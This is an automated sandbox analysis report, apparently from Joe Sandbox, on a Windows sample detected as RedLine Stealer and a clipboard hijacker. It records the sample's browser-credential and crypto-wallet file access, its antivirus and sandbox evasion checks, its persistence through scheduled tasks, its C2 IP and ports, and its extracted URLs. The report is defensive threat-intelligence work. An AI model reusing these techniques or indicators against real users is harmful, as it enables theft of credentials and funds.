Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_004123F1 SetUnhandledExceptionFilter, 1_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_00408740 SetUnhandledExceptionFilter, 11_2_00408740
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_0040BF70 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0040BF70
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Code function: 14_2_00408740 SetUnhandledExceptionFilter, 14_2_00408740
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Code function: 14_2_0040BF70 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_0040BF70
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Process created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe'
Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmp; Binary or memory string: &Program Manager
Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: GetLocaleInfoA, 1_2_00417A20
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_004199E0 GetLastError,GetPrivateProfileIntW,GetLastError,GetNumberFormatA,GetCPInfoExW,GetCommandLineW,GetStartupInfoA,SetFileShortNameA,CreateNamedPipeA,GetBinaryType,HeapDestroy, 11_2_004199E0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_00412A15
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: eYvT1lg5Dy.exe, 00000001.00000002.445636193.000000000890F000.00000004.00000001.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ec996.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ec996.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.4c50000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.4c50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: eYvT1lg5Dy.exe PID: 6504, type: MEMORYSTR
Yara detected Clipboard Hijacker
Source: Yara match; File source: 11.2.filename.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.3.sihost.exe.2c70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.3.filename.exe.2c70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.sihost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.filename.exe.2c60e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.sihost.exe.2c60e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.sihost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.filename.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.609430439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000003.432844510.0000000002C70000.00000004.00000001.sdmp, type: MEMORY
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

                      Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ec996.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ec996.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.4c50000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.4c50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: eYvT1lg5Dy.exe PID: 6504, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Scheduled Task/Job1Process Injection13Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery134SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing21NTDSSecurity Software Discovery471Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion231Cached Domain CredentialsProcess Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection13DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

[Behavior graph rendered as an image; recoverable node information follows]

Behavior Graph ID: 490258; Sample: eYvT1lg5Dy.exe; Startdate: 25/09/2021; Architecture: WINDOWS; Score: 100
Top-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Clipboard Hijacker; 2 other signatures
Processes started from the sample: eYvT1lg5Dy.exe; sihost.exe

eYvT1lg5Dy.exe
  Network: 80.87.192.249 (ports 16640, 49737), THEFIRST-ASRU, Russian Federation; s3-r-w.us-east-2.amazonaws.com 52.219.104.152 (ports 443, 49741), AMAZON-02US, United States; 2 other IPs or domains
  Dropped: C:\Users\user\AppData\Local\...\filename.exe (PE32); C:\Users\user\AppData\...\eYvT1lg5Dy.exe.log (ASCII)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 3 other signatures
  Started: filename.exe; conhost.exe

sihost.exe
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to compare user and computer (likely to detect sandboxes)
  Started: schtasks.exe, which started conhost.exe

filename.exe
  Dropped: C:\Users\user\AppData\Roaming\...\sihost.exe (PE32)
  Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 3 other signatures
  Started: schtasks.exe, which started conhost.exe


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source            Detection   Scanner          Label
eYvT1lg5Dy.exe    49%         Virustotal
eYvT1lg5Dy.exe    34%         Metadefender
eYvT1lg5Dy.exe    81%         ReversingLabs    Win32.Ransomware.WannaCry
eYvT1lg5Dy.exe    100%        Joe Sandbox ML

                      Dropped Files

Source                                                        Detection   Scanner          Label
C:\Users\user\AppData\Local\Temp\filename.exe                 100%        Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe    100%        Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\filename.exe                 49%         ReversingLabs    Win32.Trojan.Racealer
C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe    49%         ReversingLabs    Win32.Trojan.Racealer

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      11.2.filename.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                      14.2.sihost.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      https://api.ip.sb/geoip%USERPEnviron | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartInstalledSoftwares | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartNordVPN | 0% | Avira URL Cloud | safe
                      http://tempuri.org/ | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartDiscord | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartInstalledBrowsersResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartColdWalletsResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartTelegramFilesResponsel | 0% | Avira URL Cloud | safe
                      https://cdn.ecosia/ | 0% | Avira URL Cloud | safe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
                      http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartProtonVPNResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartDiscordResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartFtpConnectionsResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartOpenVPN | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartOpenVPNResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartProtonVPN | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartHardwaresResponse | 0% | Avira URL Cloud | safe
                      http://tempuri.org/Endpoint/PartTelegramFilesResponse | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      s3-r-w.us-east-2.amazonaws.com | 52.219.104.152 | true | false | | high
                      api.ip.sb | unknown | unknown | false | | unknown
                      cli-4576347563476534786.s3.us-east-2.amazonaws.com | unknown | unknown | false | | high

                            URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sct | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      https://api.ip.sb/geoip%USERPEnviron | eYvT1lg5Dy.exe | false | Avira URL Cloud: safe | unknown
                      https://duckduckgo.com/chrome_newtab | eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | false | | high
                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      https://duckduckgo.com/ac/?q= | eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartInstalledSoftwares | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagews.com/crypted.exe | eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartNordVPN | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://docs.oasis-open.org/ws-tx/wscoor/2006/06 | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/ | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartDiscord | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://tempuri.org/Endpoint/SetEnvironment | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      https://support.google.com/chrome/?p=plugin_real | eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/10/wsat | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/VerifyUpdate | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartInstalledBrowsersResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://tempuri.org/Endpoint/PartColdWalletsResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartTelegramFilesResponsel | eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      https://cdn.ecosia/ | eYvT1lg5Dy.exe, 00000001.00000002.448050710.000000000A570000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE% | eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp | false | URL Reputation: safe | unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | false | | high
                      http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse | eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://tempuri.org/Endpoint/PartProtonVPNResponse | eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartDiscordResponse | eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
